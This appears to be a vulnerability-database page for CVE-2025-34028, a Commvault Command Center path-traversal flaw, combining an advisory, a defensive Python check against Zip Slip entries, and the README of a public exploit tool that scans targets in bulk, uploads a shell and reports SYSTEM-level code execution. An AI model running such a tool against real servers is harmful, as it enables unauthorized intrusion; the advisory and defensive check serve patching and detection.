
CVE-2025-34028 PoC — Commvault Command Center Innovation Release <= 11.38.25 Unauthenticated Install Package Path Traversal

Associated Vulnerability
Title: Commvault Command Center Innovation Release <= 11.38.25 Unauthenticated Install Package Path Traversal (CVE-2025-34028)
Description: The Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files representing install packages; when the target server expands such a package, a path traversal vulnerability can result in Remote Code Execution via a malicious JSP. This issue affects Command Center Innovation Release: 11.38.0 to 11.38.20. The vulnerability is fixed in 11.38.20 with SP38-CU20-433 and SP38-CU20-436 and also fixed in 11.38.25 with SP38-CU25-434 and SP38-CU25-438.
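The defect described above is a path traversal during install-package expansion (the Zip Slip pattern). The following Python check is an added example, not code from this page or from the PoC repository: it shows how a server-side unpacker should validate every archive entry against the staging directory before extracting anything. The archive contents, the `dest_dir` values and the function names are constructed for the illustration.

```python
import io
import os
import zipfile


def build_sample_package(include_traversal: bool) -> bytes:
    """Constructed sample 'install package' (not a real Commvault artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("package/manifest.txt", "version=1\n")
        if include_traversal:
            # Entry name climbs out of the extraction directory (Zip Slip).
            zf.writestr("../../dropped.jsp", "placeholder")
    return buf.getvalue()


def traversal_entries(package: bytes, dest_dir: str) -> list[str]:
    """Names of archive entries that would land outside dest_dir."""
    root = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            # Treat backslashes as separators so Windows-style names are
            # checked the same way on every platform.
            name = info.filename.replace("\\", "/")
            # Absolute paths and drive-letter prefixes never belong in a package.
            if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
                bad.append(info.filename)
                continue
            # Resolve the would-be target and require it to stay under root.
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                bad.append(info.filename)
    return bad


def safe_extract(package: bytes, dest_dir: str) -> list[str]:
    """Refuse the whole package if any entry escapes; otherwise extract it."""
    bad = traversal_entries(package, dest_dir)
    if bad:
        raise ValueError(f"refusing package, traversal entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        zf.extractall(dest_dir)
        return zf.namelist()


if __name__ == "__main__":
    for flag in (False, True):
        pkg = build_sample_package(flag)
        print("traversal entries:", traversal_entries(pkg, "/tmp/install-stage"))
```

Rejecting the whole package rather than skipping the offending entry keeps a partially unpacked, inconsistent install tree from ever reaching the server.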
Description
Proof-of-Concept (PoC) for CVE-2025-34028, a Remote Code Execution vulnerability in Commvault Command Center. This Python script scans single or multiple targets, executes commands, and reports vulnerable hosts.
Readme
# CVE-2025-34028 - Commvault Command Center Remote Code Execution
![Python](https://img.shields.io/badge/python-3.6+-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) ![Vulnerability](https://img.shields.io/badge/critical-RCE-red.svg)

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

## Features
- Single target or bulk scanning capability
- Automatic Commvault instance verification
- Detailed output with system user information
- Random path generation for each execution
- Clean summary table of vulnerable hosts
- Comprehensive error handling

## Installation
```bash
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
```

## Requirements
- Python 3.6+
- Required packages:
  - requests
  - tabulate

Install requirements with:
```bash
pip install requests tabulate
```

## Usage
```text
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line
```

## Examples
Test a single target:
```bash
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
```

Scan multiple targets from a file:
```bash
python CVE-2025-34028-Commvault.py -f targets.txt
```

## Target File Format
The targets file should contain one target per line in the format:
```text
https://host:port
http://ip
```

Example targets.txt:
```text
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
```

## Output
The script provides:
- Real-time progress with status for each target
- Detailed output for vulnerable hosts
- Summary table of all tested hosts
- Clear identification of successful exploitations

Sample output:
```text
CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+-------+---------------------------------+----------------+---------------------+
| Index | URL                             | Status         | System User         |
+-------+---------------------------------+----------------+---------------------+
| 1     | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+-------+---------------------------------+----------------+---------------------+
```

## Disclaimer
This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

## License
MIT License - See LICENSE file for details
File Snapshot

```text
[4.0K] /data/pocs/fa926f8f254c5cc45125e3273c38e8b21fa0b756
├── [5.8K] CVE-2025-34028-Commvault.py
├── [1.0K] LICENSE
├── [2.9K] README.md
└── [ 49]  requirements.txt

0 directories, 4 files
```